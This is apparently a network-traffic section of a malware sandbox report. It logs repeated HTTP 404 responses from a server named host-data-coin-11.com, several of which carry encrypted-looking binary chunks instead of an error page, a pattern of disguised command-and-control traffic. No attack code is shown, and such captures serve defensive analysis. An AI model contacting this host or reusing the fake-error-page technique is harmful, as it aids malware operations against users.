                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 03:59:39 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 03:59:39 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 03:59:40 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 48 e5 af 8d 70 bc 57 dd 40 d6 f6 2e 84 2a e8 c3 90 53 2e ef a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OR&:UPJ%9HpW@.*S.c0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 03:59:41 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 03:59:42 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 66 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 80 49 08 25 01 e5 e9 8d b0 a2 37 0d 0a 30 0d 0a 0d 0a Data Ascii: 1fI:82OI%70
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 03:59:42 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 30 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 93 54 06 65 01 f6 a3 9e fc b9 19 eb 1b db 76 f8 67 5d a4 09 d7 cd 66 c7 64 50 06 b9 0d 0a 30 0d 0a 0d 0a Data Ascii: 30I:82OTevg]fdP0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 03:59:43 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 03:59:43 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 46 e8 ae 88 70 bc 57 dd 43 df f9 21 87 26 ec c3 91 50 23 e4 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OR&:UPJ%9FpWC!&P#c0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 03:59:46 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 03:59:46 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 39 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c0 d7 10 55 3a 40 a9 fe c2 aa b9 01 ac 52 cc 77 f8 0f 11 91 1d f4 0d 0a 30 0d 0a 0d 0a Data Ascii: 29I:82OU:@Rw0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Fri, 14 Jan 2022 03:59:46 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingData Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 66 6c 65 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 6f 7a 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 77 65 62 6b 69 74 2d 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 2d 6d 6f 7a 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 69 6e 68 65 72 69 74 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 33 32 70 78 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 77 65 62 6b 69 74 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 2d 6d 6f 7a 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 6d 6f 7a 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 6d 73 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 70 61 64 64 69 6e 67 3a 31 32 38 70 78 20 31 36 70 78 20 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 2d 6d 6f 7a 2d 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 03:59:47 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 30 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 93 54 06 65 01 f6 a3 9e fc b9 19 eb 1b db 76 f8 43 4e c7 3d c2 ec 66 b5 64 50 06 b9 0d 0a 30 0d 0a 0d 0a Data Ascii: 30I:82OTevCN=fdP0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 03:59:50 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 03:59:51 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 03:59:51 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 30 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 93 54 06 65 01 f6 a3 9e fc b9 19 eb 1b db 76 f8 43 4e c7 3d c2 ec 66 b5 64 50 06 b9 0d 0a 30 0d 0a 0d 0a Data Ascii: 30I:82OTevCN=fdP0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 03:59:54 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
